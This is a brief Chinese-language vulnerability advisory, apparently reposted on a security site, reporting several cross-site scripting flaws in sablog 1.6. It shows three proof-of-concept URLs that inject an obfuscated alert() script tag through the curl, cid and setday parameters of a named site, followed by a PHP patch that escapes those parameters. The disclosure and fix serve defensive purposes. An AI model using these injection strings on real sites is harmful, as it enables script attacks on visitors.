首页 网络安全 安全学院 查看内容

sablog 1.6 多个跨站漏洞

2008-4-12 10:29 1248 0

摘要: Version:sablog 1.6由于过滤不严,存在多个跨站漏洞PS: 以下是引用片段:http://www.amxku.net/?viewmode=list&curl=>...
关键词: modelink htmlspecialchars nbsp setday action amp setdate curl item searchid

Version:sablog 1.6由于过滤不严,存在多个跨站漏洞PS: 以下是引用片段:http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>http://www.amxku.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>http://www.amxku.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1临时解决办法:在global.php中过滤curl,cid,setday等 $modelink = '';if ($action) { $modelink .= '&amp;action='.$action;}if ($curl) { $modelink .= '&amp;curl='.htmlspecialchars($curl);}if ($cid) { $modelink .= '&amp;cid='.htmlspecialchars($cid);}if ($setdate) { $modelink .= '&amp;setdate='.htmlspecialchars($setdate);}if ($setday) { $modelink .= '&amp;setday='.htmlspecialchars($setday);}if (intval($_GET['searchid'])) { $modelink .= '&amp;searchid='.htmlspecialchars($_GET['searchid']);}if (intval($_GET['userid'])) { $modelink .= "&amp;userid=".htmlspecialchars($_GET['userid']);}if ($_GET['item']) { $item = urlencode(addslashes($item)); $modelink .= '&amp;item='.$item;}
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部